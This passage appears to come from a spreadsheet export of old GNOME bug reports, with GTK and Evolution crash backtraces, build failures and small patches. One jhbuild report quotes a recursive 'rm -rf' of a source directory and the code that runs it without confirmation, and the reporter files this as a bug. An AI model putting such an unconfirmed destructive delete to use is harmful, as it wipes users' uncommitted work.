    param_values=0xbfa356ec invocation_hint=0xbfa355cc marshal_data=0x4c) at gclosure.c:567
#54 0x0084f02d in IA__g_closure_invoke (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa356ec invocation_hint=0xbfa355cc) at gclosure.c:490
#55 0x00860d8f in signal_emit_unlocked_R (node=0x9775d78 detail=0 instance=0x9daf200 emission_return=0x0
    instance_and_params=0xbfa356ec) at gsignal.c:2554
#56 0x00861a43 in IA__g_signal_emit_valist (instance=0x9daf200 signal_id=18 detail=0
    var_args=0x871eec ï¿½\006) at gsignal.c:2197
#57 0x00861ce9 in IA__g_signal_emit (instance=0x9daf200 signal_id=18 detail=0) at gsignal.c:2241
#58 0x010d72be in gtk_object_dispose (gobject=0x9daf200) at gtkobject.c:418
#59 0x011e4201 in gtk_widget_dispose (object=0x9daf200) at gtkwidget.c:6873
#60 0x008516d0 in IA__g_object_run_dispose (object=0x9daf200) at gobject.c:571
#61 0x010d6b51 in IA__gtk_object_destroy (object=0x9daf200) at gtkobject.c:403
#62 0x011e3895 in IA__gtk_widget_destroy (widget=0x9daf200) at gtkwidget.c:2158
#63 0x00fc40c5 in gtk_bin_forall (container=0x9c09008 include_internals=0
    callback=0x11e3850  callback_data=0x0) at gtkbin.c:133
#64 0x0100b88b in IA__gtk_container_foreach (container=0x9c09008
    callback=0x11e3850  callback_data=0x0) at gtkcontainer.c:1288
#65 0x0100d9d7 in gtk_container_destroy (object=0x9c09008) at gtkcontainer.c:825
#66 0x011f4aac in gtk_window_destroy (object=0x9c09008) at gtkwindow.c:3954
#67 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa35cec invocation_hint=0xbfa35bcc marshal_data=0x11f4a00) at gmarshal.c:77
#68 0x0084d769 in g_type_class_meta_marshal (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa35cec invocation_hint=0xbfa35bcc marshal_data=0x4c) at gclosure.c:567
#69 0x0084ef4b in IA__g_closure_invoke (closure=0x9775d40 return_value=0x0 n_param_values=1
    param_values=0xbfa35cec invocation_hint=0xbfa35bcc) at gclosure.c:490
#70 0x00860d8f in signal_emit_unlocked_R (node=0x9775d78 detail=0 instance=0x9c09008 emission_return=0x0
    instance_and_params=0xbfa35cec) at gsignal.c:2554
#71 0x00861a43 in IA__g_signal_emit_valist (instance=0x9c09008 signal_id=18 detail=0
    var_args=0x44eec5 \203ï¿½\004[]ï¿½\220\215t&amp;) at gsignal.c:2197
#72 0x00861ce9 in IA__g_signal_emit (instance=0x9c09008 signal_id=18 detail=0) at gsignal.c:2241
#73 0x010d72be in gtk_object_dispose (gobject=0x9c09008) at gtkobject.c:418
#74 0x011e4201 in gtk_widget_dispose (object=0x9c09008) at gtkwidget.c:6873
#75 0x011f191c in gtk_window_dispose (object=0x9c09008) at gtkwindow.c:1794
#76 0x008516d0 in IA__g_object_run_dispose (object=0x9c09008) at gobject.c:571
#77 0x010d6b51 in IA__gtk_object_destroy (object=0x9c09008) at gtkobject.c:403
#78 0x011e3895 in IA__gtk_widget_destroy (widget=0x9c09008) at gtkwidget.c:2158
#79 0x080cad3f in rb_song_info_response_cb (dialog=0x9c09008 response_id=-7 song_info=0x9c09008)
    at rb-song-info.c:646
#80 0x0085d3b3 in IA__g_cclosure_marshal_VOID__INT (closure=0x9bfbca0 return_value=0x0 n_param_values=2
    param_values=0xbfa3627c invocation_hint=0xbfa3615c marshal_data=0x80cace0) at gmarshal.c:216
#81 0x0084ef4b in IA__g_closure_invoke (closure=0x9bfbca0 return_value=0x0 n_param_values=2
    param_values=0xbfa3627c invocation_hint=0xbfa3615c) at gclosure.c:490
#82 0x008605e5 in signal_emit_unlocked_R (node=0x9cc9050 detail=0 instance=0x9c09008 emission_return=0x0
    instance_and_params=0xbfa3627c) at gsignal.c:2438
#83 0x00861a43 in IA__g_signal_emit_valist (instance=0x9c09008 signal_id=346 detail=0
    var_args=0xbfa364c0 4\a\210) at gsignal.c:2197
#84 0x00861ce9 in IA__g_signal_emit (instance=0x9c09008 signal_id=346 detail=0) at gsignal.c:2241
#85 0x0101f28a in IA__gtk_dialog_response (dialog=0x9c09008 response_id=-7) at gtkdialog.c:835
#86 0x0101f2e5 in action_widget_activated (widget=0x9c5c5b0 dialog=0x9c09008) at gtkdialog.c:534
#87 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x9c98ba0 return_value=0x0 n_param_values=1
    param_values=0xbfa3675c invocation_hint=0xbfa3663c marshal_data=0x101f2c0) at gmarshal.c:77
#88 0x0084ef4b in IA__g_closure_invoke (closure=0x9c98ba0 return_value=0x0 n_param_values=1
    param_values=0xbfa3675c invocation_hint=0xbfa3663c) at gclosure.c:490
#89 0x008605e5 in signal_emit_unlocked_R (node=0x979e140 detail=0 instance=0x9c5c5b0 emission_return=0x0
    instance_and_params=0xbfa3675c) at gsignal.c:2438
#90 0x00861a43 in IA__g_signal_emit_valist (instance=0x9c5c5b0 signal_id=108 detail=0 var_args=0x0)
    at gsignal.c:2197
#91 0x00861ce9 in IA__g_signal_emit (instance=0x9c5c5b0 signal_id=108 detail=0) at gsignal.c:2241
#92 0x00fc8fa3 in IA__gtk_button_clicked (button=0x9c5c5b0) at gtkbutton.c:889
#93 0x00fcb13e in gtk_real_button_released (button=0x9c5c5b0) at gtkbutton.c:1455
#94 0x0085c759 in IA__g_cclosure_marshal_VOID__VOID (closure=0x979e720 return_value=0x0 n_param_values=1
    param_values=0xbfa36c5c invocation_hint=0xbfa36b3c marshal_data=0xfcb100) at gmarshal.c:77
#95 0x0084d769 in g_type_class_meta_marshal (closure=0x979e720 return_value=0x0 n_param_values=1
    param_values=0xbfa36c5c invocation_hint=0xbfa36b3c marshal_data=0x1a4) at gclosure.c:567
#96 0x0084ef4b in IA__g_closure_invoke (closure=0x979e720 return_value=0x0 n_param_values=1
    param_values=0xbfa36c5c invocation_hint=0xbfa36b3c) at gclosure.c:490
#97 0x00860a6a in signal_emit_unlocked_R (node=0x979e748 detail=0 instance=0x9c5c5b0 emission_return=0x0
    instance_and_params=0xbfa36c5c) at gsignal.c:2368
#98 0x00861a43 in IA__g_signal_emit_valist (instance=0x9c5c5b0 signal_id=107 detail=0
    var_args=0xcf07ac \213M\f\211A\004\213U\020\017ï¿½\002\211q\fï¿½ï¿½\037\211A\b\213B\004\211A\020\017ï¿½B\b\211A\030\017ï¿½B\034\210AL\017ï¿½B\035\210AM\017ï¿½B\036\210AN\017ï¿½B\037\210AO\017ï¿½B\032\211A\034\017ï¿½B\r\211A \017ï¿½B\016\211A$\017ï¿½B\020\211A(\017ï¿½B\022\211A\017ï¿½B\t\211A0\017ï¿½B\n\211A4\017ï¿½B\v\211A8\017ï¿½B\f\211A&lt;\017ï¿½B\023\211A@\017ï¿½B\024\210AD\017ï¿½B\025\210AE\017ï¿½B\026\210AF\017ï¿½B\027\210AG\017ï¿½B\030\211AHï¿½\001) at gsignal.c:2197
#99 0x00861ce9 in IA__g_signal_emit (instance=0x9c5c5b0 signal_id=107 detail=0) at gsignal.c:2241
#100 0x00fc9033 in IA__gtk_button_released (button=0x9c5c5b0) at gtkbutton.c:881
#101 0x00fc90b2 in gtk_button_button_release (widget=0x9c5c5b0 event=0x9daf020) at gtkbutton.c:1348
#102 0x010b1858 in _gtk_marshal_BOOLEAN__BOXED (closure=0x9716668 return_value=0xbfa37070 n_param_values=2
    param_values=0xbfa3717c invocation_hint=0xbfa3705c marshal_data=0xfc9070) at gtkmarshalers.c:83
#103 0x0084d769 in g_type_class_meta_marshal (closure=0x9716668 return_value=0xbfa37070 n_param_values=2
    param_values=0xbfa3717c invocation_hint=0xbfa3705c marshal_data=0xb4) at gclosure.c:567
#104 0x0084ef4b in IA__g_closure_invoke (closure=0x9716668 return_value=0xbfa37070 n_param_values=2
    param_values=0xbfa3717c invocation_hint=0xbfa3705c) at gclosure.c:490
#105 0x00860c23 in signal_emit_unlocked_R (node=0x9776390 detail=0 instance=0x9c5c5b0
    emission_return=0xbfa3733c instance_and_params=0xbfa3717c) at gsignal.c:2476
#106 0x008618f6 in IA__g_signal_emit_valist (instance=0x9c5c5b0 signal_id=60 detail=0
    var_args=0xbfa373c0 ï¿½sï¿½ï¿½ ï¿½ï¿½\tï¿½ï¿½ï¿½\tï¿½ï¿½\035\001ï¿½ï¿½ï¿½\tï¿½Sw\t) at gsignal.c:2207
#107 0x00861ce9 in IA__g_signal_emit (instance=0x9c5c5b0 signal_id=60 detail=0) at gsignal.c:2241
#108 0x011da778 in gtk_widget_event_internal (widget=0x9c5c5b0 event=0x9daf020) at gtkwidget.c:3901
#109 0x010a9c9e in IA__gtk_propagate_event (widget=0x9c5c5b0 event=0x9daf020) at gtkmain.c:2186
#110 0x010ab045 in IA__gtk_main_do_event (event=0x9daf020) at gtkmain.c:1420
#111 0x005502fa in gdk_event_dispatch (source=0x9787af0 callback=0 user_data=0x0) at gdkevents-x11.c:2314
#112 0x077cb1bd in IA__g_main_context_dispatch (context=0x9787b38) at gmain.c:1916
#113 0x077ce43f in g_main_context_iterate (context=0x9787b38 block=1 dispatch=1 self=0x97188e8)
    at gmain.c:2547
#114 0x077ce7e9 in IA__g_main_loop_run (loop=0x9c63860) at gmain.c:2751
#115 0x010ab4d4 in IA__gtk_main () at gtkmain.c:999
#116 0x0806d634 in main (argc=1 argv=0xbfa377c4) at main.c:375</t>
  </si>
  <si>
    <t>EVOLUTION-246256</t>
  </si>
  <si>
    <t>Find in Message dialog - label suggestions</t>
  </si>
  <si>
    <t>Find in Message dialog - To open select a message then choose Edit &gt;
Search Message.
5. s/Case Sensitive/Case sensitive
This bug blocks bug 246224.</t>
  </si>
  <si>
    <t>NAUTILUS-77624</t>
  </si>
  <si>
    <t>patch to add focus keynav and accessibility to the zoom control</t>
  </si>
  <si>
    <t>this is also in the sun_patches module.  ChangeLogs available on request.</t>
  </si>
  <si>
    <t>EPIPHANY-165542</t>
  </si>
  <si>
    <t>warning when using epiphany -b with disabled bookmarks</t>
  </si>
  <si>
    <t>Steps to reproduce:
0) Disable bookmarks editing (/apps/epiphany/lockdown/disable_bookmark_editing)
1) epiphany -b
Result:
(epiphany:13674): GLib-GObject-CRITICAL **: g_object_unref: assertion
`G_IS_OBJECT (object)' failed
epiphany[0x80e906b]</t>
  </si>
  <si>
    <t>NAUTILUS-42015</t>
  </si>
  <si>
    <t>Consider disallowing some impossible searches</t>
  </si>
  <si>
    <t xml:space="preserve">This was split off from bug 41969.
There's code now to disable the Find button when the user has left one or more
search text fields empty. We could also disable the Find button at this same
code bottleneck when the user set up a set of criteria that are logically
impossible. However it seems that this is not necessary if we do not repeat any
search criteria (as bug 41937 discusses). So I think this is a non-issue in our
first release. Assigning to Arlo so he's aware of the issue and to make sure I'm
not overlooking something. Arlo please add your thoughts on this issue. You can
defer it if you agree that there's nothing to do for our first release but there
might be something to do later.
------- Additional Comments From arlo@workthatmouse.com 2000-08-07 16:35:28 ----
Agreed...
I should note however that I really would like to start a search even if 
fields are empty but just not use those fields.
------- Additional Comments From arlo@workthatmouse.com 2000-08-18 16:29:35 ----
I think we decided on this... assign back to me if I'm wrong.
(We went for dimming the start search button if I remember correctly.)
------- Additional Comments From sullivan@eazel.com 2000-08-21 10:10:43 ----
Dimming the start search button (or displaying a dialog) is covered separately
by bug 42016. So this bug is specifically about non-empty-text cases. Marking
deferred.
------- Additional Comments From eli@eazel.com 2000-10-16 18:59:53 ----
Batch-assigning QA ownership of Search Interface bugs to Josh Barrow.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:36 -------
</t>
  </si>
  <si>
    <t>GLIB-65624</t>
  </si>
  <si>
    <t>configure logic broken</t>
  </si>
  <si>
    <t>When configuring with --with-threads=none
the following error happens
gthread.c: In function `g_static_rec_mutex_lock':
gthread.c:243: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c:243: (Each undeclared identifier is reported only once
gthread.c:243: for each function it appears in.)
gthread.c: In function `g_static_rec_mutex_trylock':
gthread.c:265: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_static_rec_mutex_unlock':
gthread.c:292: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_static_rec_mutex_lock_full':
gthread.c:308: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_static_rec_mutex_unlock_full':
gthread.c:330: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_thread_cleanup':
gthread.c:502: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_thread_join':
gthread.c:596: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)
gthread.c: In function `g_thread_set_priority':
gthread.c:627: `GLIB_SIZEOF_SYSTEM_THREAD' undeclared (first use in this
function)</t>
  </si>
  <si>
    <t>kladit</t>
  </si>
  <si>
    <t>GNOME-CORE-70917</t>
  </si>
  <si>
    <t>Build fails on non interactive console</t>
  </si>
  <si>
    <t>While building gnome-core on my building-monster-of-a-machine it fails
because it can not open a connection to the X server that initiated the build.
(i ssh there and in a 'screen' session do a nightly full gnome2 build)
The error it presents me with is:
creating panel-applet-scan
lt-panel-applet-scan (pid:29078): Gtk-WARNING **: cannot open display:
sauron.chabotc.com:10.0
Scan failed
make[4]: *** [scan-build.stamp] Error 1
make[4]: Leaving directory
`/usr/src/redhat/BUILD/gnome-core-1.5.7/doc/reference/panel-applet'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory
`/usr/src/redhat/BUILD/gnome-core-1.5.7/doc/reference'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/usr/src/redhat/BUILD/gnome-core-1.5.7/doc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/usr/src/redhat/BUILD/gnome-core-1.5.7'
make: *** [all-recursive-am] Error 2
Is this something which is fixable in the build process of gnome-core or
is it something where i should do a unset of the DISPLAY var before building?</t>
  </si>
  <si>
    <t>EVOLUTION-201411</t>
  </si>
  <si>
    <t>E-sexp engine for matching calendar components</t>
  </si>
  <si>
    <t>We need an e-sexp based engine that can match calendar components.</t>
  </si>
  <si>
    <t>MONKEY-BUBBLE-354233</t>
  </si>
  <si>
    <t>Game Engine</t>
  </si>
  <si>
    <t>Install icon in hicolor</t>
  </si>
  <si>
    <t>Getting some icon theme love would be nice :-)</t>
  </si>
  <si>
    <t>WEBSITE-150280</t>
  </si>
  <si>
    <t>art.gnome.org - wrong link for download</t>
  </si>
  <si>
    <t>The website art.gnome.org has some links at below the banner. The download
link refers to http://www.gnome.org/start/2.4/
This should be http://www.gnome.org/start/2.6/ (or something appropriate).</t>
  </si>
  <si>
    <t>christoph</t>
  </si>
  <si>
    <t>GNOME-APPLETS-304329</t>
  </si>
  <si>
    <t>use gdk-pixbuf-flip</t>
  </si>
  <si>
    <t>applet.c has its own version of gdk_pixbuf_flip() we should use the official one.</t>
  </si>
  <si>
    <t>GDL-515634</t>
  </si>
  <si>
    <t>Improve docs coverage</t>
  </si>
  <si>
    <t>Currently gdl has only 12% doc coverage. This really needs to be improved so if you have the time add gtk-doc comments to the source.</t>
  </si>
  <si>
    <t>TOTEM-476855</t>
  </si>
  <si>
    <t>Disable screenshot menu item</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #352142 +++
&gt; The screenshot menu item should be disabled if the current media doesn't
&gt; contain a  video stream (audio only).
GStreamer doesn't allow for screenshots of the visualisations to be taken.</t>
  </si>
  <si>
    <t>GUPNP-AV-730591</t>
  </si>
  <si>
    <t>GUPNP-AV</t>
  </si>
  <si>
    <t>Remove unused assignment</t>
  </si>
  <si>
    <t xml:space="preserve">Coverity issue 60874
Signed-off-by: Jens Georg </t>
  </si>
  <si>
    <t>gupnp-maint</t>
  </si>
  <si>
    <t>PAN-109273</t>
  </si>
  <si>
    <t>deleting article headers doesn't delete from the article cache too</t>
  </si>
  <si>
    <t>from pan-users:
On Tue 25 Mar 2003 00:52 Lin Ford posted as excerpted below:
&gt; Thirdly I do not use the remove article after x days as some groups I like
&gt; to keep the articles for a little longer than other groups.  So I use the
&gt; delete.  It removes it from the pan window but does not delete from the
&gt; hard drive.  It used to work properly in Pan 0.13.4.
I noticed the same problem recently.  I deleted a bunch of messages then
decided I wanted to change a filter I had so reloaded overviews for the
group and altho I expected the overviews to be back along with them PAN
showed entire messages as cached and I had NOT re-d/led messages only the
overviews (as demonstrated by the fact that ones I had NOT d/led earlier
remained un-d/led).
If I say delete messages I don't mean just delete the reference listing in
the overview pane I mean delete the actual message overview body and all!</t>
  </si>
  <si>
    <t>JHBUILD-509365</t>
  </si>
  <si>
    <t>rm -rf 's without confirmation</t>
  </si>
  <si>
    <t>$ jhbuild buildone mousetweaks
*** Checking out mousetweaks *** [1/1]
rm -rf /home/chpe/source/gnome-2/trunk/mousetweaks
This is obviously bad what if I had had some changes in that directory?
   def _wipedir(self buildscript):
        if os.path.exists(self.srcdir):
            buildscript.execute(['rm' '-rf' self.srcdir])
jhbuild *must* confirm with the user before rm -rf'ing.</t>
  </si>
  <si>
    <t>GNOME-VFS-105094</t>
  </si>
  <si>
    <t>gnome_vfs_uri_resolve_relative () probably a bug!</t>
  </si>
  <si>
    <t>Hello I think I've detected some bug in this function when it comes to
resolve:
Let's have the following assumption:
----------------------------------------
The baseURI is 'http://www.gnome.org/' &lt;-- with ending /
gnome_vfs_uri_resolve_relative (base_uri paladium.html)
will result in 'http://www.gnome.org/paladium.html'
Pay attention that the baseURI has an ending slash and that the url itself
has nothing than the html page in it. it's only an assuming scenario I
leave the not required stuff out such as the result from the function etc.
----------------------------------------
now we change the base URI
The baseURI is 'http://www.gnome.org' &lt;-- without ending /
gnome_vfs_uri_resolve_relative (base_uri ./paladium.html)
will result in 'http://www.gnome.org/paladium.html'
Please pay attention that the baseURI has NO ending slash but the url
itself got a relative location ./ before it. The result is still valid and ok.
----------------------------------------
now we change the base URI
The baseURI is 'http://www.gnome.org' &lt;-- without ending /
gnome_vfs_uri_resolve_relative (base_uri paladium.html)
will result in 'http://paladium.html'
And this is not correct. The result imo should be the same as the previous
two examples. I wrote a little program here which streams a webpage into a
buffer and hands gives over the urls found in the html file.
----------------------------------------
I'm not sure if this has to be that way but having no ending SLASH at the
baseURI and having NO SLASHES (which symbols relative path) infront of it
SHOULD not mean that resolved url become the new URI.
I hope I'm not mistaken here since I have no further material to read about
this. Please enlighten me and in case this is a error for me.</t>
  </si>
  <si>
    <t>NAUTILUS-525457</t>
  </si>
  <si>
    <t>Background preview rotates jpg but background does not</t>
  </si>
  <si>
    <t>Please describe the problem:
I have an JPEG photo that I've rotated in F-spot and this is respected by EOG.  Presumably this rotation is JPEG metadata.  I've used EOG to set this image as my desktop background.  The image appears in the preview of Change Desktop Background with the correct orientation however appears incorrectly as the desktop background.
Steps to reproduce:
1. Create a JPEG file
2. Use EOG/F-Spot to rotate the JPEG around 90 degrees
3. Set the JPEG as your desktop background
Actual results:
The desktop background preview shows the JPEG correctly rotated (around 90 degrees as set in the metadata) the desktop backround shows an unrotated JPEG (i.e. it ignores the metadata)
Expected results:
One expects the desktop background to be rotated as other GNOME applications view the JPEG.
Does this happen every time?
Yes.
Other information:
Screenshot attached</t>
  </si>
  <si>
    <t>GNOME-PANEL-108422</t>
  </si>
  <si>
    <t>corner panel?</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: trivial
Version: 2.2.1
Synopsis: corner panel?
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
Description:
Description of Problem:
I know it's just snively but the corner panel doesn't only go in the
corner and so is misnamed.  I didn't realize it would go to the center
until I was playing around one day.
I don't know what to rename it to but it would be nice if the name of
the panel conotated the fact that it's fixed at points but can be at
the edge and at the center.
Steps to reproduce the problem:
1. click an empty spot on the panel
2. go to the new panel options
3. look at the entries in the menu
Actual Results:
the panel name doesn't fully describe the function/apperance of the
panel
Expected Results:
the panel name describes the panel
How often does this happen?
every time
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-03-14 20:55 -------
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>cposs</t>
  </si>
  <si>
    <t>GNOME-USER-SHARE-475994</t>
  </si>
  <si>
    <t>a small leak</t>
  </si>
  <si>
    <t>diff -up gnome-user-share-0.11/user_share.c.str-leak gnome-user-share-0.11/user_share.c
--- gnome-user-share-0.11/user_share.c.str-leak 2007-09-11 16:00:18.000000000 -0400
+++ gnome-user-share-0.11/user_share.c  2007-09-11 16:00:40.000000000 -0400
@@ -5946 +5947 @@ spawn_httpd (int port pid_t *pid_out)
                argv[i++] = RequirePasswordAlways
     }
+    g_free (str)
     g_object_unref (client)
     argv[i] = NULL</t>
  </si>
  <si>
    <t>EVOLUTION-251596</t>
  </si>
  <si>
    <t>Evolution crashed when opening settings window</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I clicked on the the Actions-&gt;Settings menu and evolution crashed. Had been
 sending and receiving email during the evolution session.
How often does this happen? 
Additional Information:
STACK
-----------------------------------------------------------------------------
0x400f810a in waitpid () from /lib/libpthread.so.0
#0  0x400f810a in waitpid () from /lib/libpthread.so.0
#1  0x403c5fa7 in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
#2  0x08067568 in segv_redirect (sig=11) at main.c:481
#3  0x400f6d0d in __pthread_sighandler () from /lib/libpthread.so.0
#4  
#5  0x406970a0 in giop_send_buffer_append_string ()
   from /usr/lib/libORBit-2.so.0
#6  0x406a233f in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#7  0x4069ad5d in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
#8  0x4069b2a2 in ORBit_small_invoke_stub () from /usr/lib/libORBit-2.so.0
#9  0x4069b194 in ORBit_small_invoke_stub_n () from /usr/lib/libORBit-2.so.0
#10 0x406abab1 in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
#11 0x4002ed97 in GNOME_Evolution_Shell_createNewWindow (_obj=0x8155e80 
    component_id=0x0 ev=0xbffff500) at Evolution-stubs.c:2044
#12 0x08067490 in idle_cb (data=0x0) at main.c:439
#13 0x41057743 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#14 0x41054b35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#15 0x41055b78 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#16 0x41055e8d in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#17 0x4105658f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#18 0x405ce2e1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#19 0x08067a6b in main (argc=3 argv=0xbffff834) at main.c:619
#20 0x410b1917 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 81926 (LWP 2543)):
#0  0x410c46a8 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x400f2c28 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x400eef9b in pthread_cond_wait@GLIBC_2.0 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400a6a79 in e_msgport_wait (mp=0x80ce210) at e-msgport.c:302
	_buffer = {__routine = 0x400a67e1  
  __arg = 0x80ce210 __canceltype = 1074745579 __prev = 0x0}
	msg = (EMsg *) 0x810d7c0
#4  0x400a738b in thread_dispatch (din=0x80d03c8) at e-msgport.c:665
	e = (EThread *) 0x80d03c8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x810d7c0
	self = 81926
#5  0x400f0ae0 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 98309 (LWP 2544)):
#0  0x410c46a8 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x400f2c28 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x400eef9b in pthread_cond_wait@GLIBC_2.0 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400a6a79 in e_msgport_wait (mp=0x80ce310) at e-msgport.c:302
	_buffer = {__routine = 0x400a67e1  
  __arg = 0x80ce310 __canceltype = 1074745579 __prev = 0x0}
	msg = (EMsg *) 0x0
#4  0x400a738b in thread_dispatch (din=0x80d0350) at e-msgport.c:665
	e = (EThread *) 0x80d0350
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 98309
#5  0x400f0ae0 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 2541)):
#0  0x410c46a8 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x400f2c28 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x400eef9b in pthread_cond_wait@GLIBC_2.0 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400a6a79 in e_msgport_wait (mp=0x80ce210) at e-msgport.c:302
	_buffer = {__routine = 0x400a67e1  
  __arg = 0x80ce210 __canceltype = 1074745579 __prev = 0x0}
	msg = (EMsg *) 0x81171e0
#4  0x400a738b in thread_dispatch (din=0x80d03c8) at e-msgport.c:665
	e = (EThread *) 0x80d03c8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x81171e0
	self = 49156
#5  0x400f0ae0 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 2540)):
#0  0x410c46a8 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x400f2c28 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x400eef9b in pthread_cond_wait@GLIBC_2.0 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400a6a79 in e_msgport_wait (mp=0x8117d78) at e-msgport.c:302
	_buffer = {__routine = 0x400a67e1  
  __arg = 0x8117d78 __canceltype = -1084229708 __prev = 0x0}
	msg = (EMsg *) 0xffffffd8
#4  0x41884849 in get_password (session=0x80f6200 
    prompt=0x8119758 Please enter the IMAP password for
gangell@net-ex-2k3.boston.ximian.com reprompt=0 secret=1
service=0x810c750 
    item=0x41b0fdc6 password ex=0x81150c0) at mail-session.c:380
	m = (struct _pass_msg *) 0x8119688
	r = (struct _pass_msg *) 0x0
	pass_reply = (EMsgPort *) 0x8117d78
	ret = 0x80f6170 
Output from evolution
--------------------------------------------------------------------------
(evolution-1.5:2282): Gtk-CRITICAL **: file gtktable.c: line 596
(gtk_table_attach): assertion `GTK_IS_WIDGET (child)' failed
(evolution-1.5:2282): Gtk-CRITICAL **: file gtktable.c: line 596
(gtk_table_attach): assertion `GTK_IS_WIDGET (child)' failed
(evolution-1.5:2282): Gtk-CRITICAL **: file gtkwidget.c: line 1756
(gtk_widget_hide): assertion `GTK_IS_WIDGET (widget)' failed
(evolution-1.5:2282): Gtk-CRITICAL **: file gtkwidget.c: line 1756
(gtk_widget_hide): assertion `GTK_IS_WIDGET (widget)' failed
(evolution-1.5:2282): gtkhtml-WARNING **: Cannot create spell dictionary
instance (iid:OAFIID:GNOME_Spell_Dictionary:0.3)
(evolution-1.5:2282): Bonobo-WARNING **: Activation exception 'Failed to
activate 'OAFIID:GNOME_Spell_Control:0.3''
(evolution-1.5:2282): Gdk-CRITICAL **: file gdkwindow.c: line 2329
(gdk_window_invalidate_maybe_recurse): assertion `window != NULL' failed
(evolution-1.5:2282): evolution-shell-CRITICAL **: file
evolution-folder-selector-button.c: line 449
(evolution_folder_selector_button_get_folder): assertion
`EVOLUTION_IS_FOLDER_SELECTOR_BUTTON (folder_selector_button)' failed
[New Thread 933946 (LWP 2477)]
[Thread 933946 (LWP 2477) exited]
[New Thread 950331 (LWP 2478)]
[Thread 950331 (LWP 2478) exited]
[New Thread 966716 (LWP 2479)]
[Thread 966716 (LWP 2479) exited]
getv:'Inbox' flags 00000001
[New Thread 983101 (LWP 2480)]
[Thread 983101 (LWP 2480) exited]
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
getv:'Sent' flags 00000001
getv:'Outbox' flags 00000001
getv:'Sent' flags 00000001
getv:'Inbox' flags 00000001
[New Thread 999486 (LWP 2481)]
[Thread 999486 (LWP 2481) exited]
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
getv:'Inbox' flags 00000001
getv:'Inbox' flags 00000001
clearing pending uri's
em_format_push_level
running handler for type 'multipart/mixed'
running handler for type 'text/plain'
this type is an attachment? 'image/png'
this type is an attachment? 'application/vnd.ms-excel'
this type is an attachment? 'image/jpeg'
clearing pending uri's
em_format_push_level
clearing pending uri's
em_format_push_level
(evolution-1.5:2282): evolution-mail-CRITICAL **: file em-folder-view.c:
line 1925 (emfv_setting_notify): assertion `gconf_entry_get_value (entry)
!= NULL' failed
clearing pending uri's
em_format_push_level
clearing pending uri's
em_format_push_level
running handler for type 'multipart/mixed'
running handler for type 'text/plain'
this type is an attachment? 'image/png'
this type is an attachment? 'application/vnd.ms-excel'
this type is an attachment? 'image/jpeg'
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.18-14
evolution1.5-1.5.0.200312020530-0.snap.ximian.6.1
evolution-data-server-0.0.1.0.200312020530-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libsoup2.2-2.1.1.0.200312020530-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.2.0.200312020530-0.snap.ximian.6.1
libgal21-0.23-1
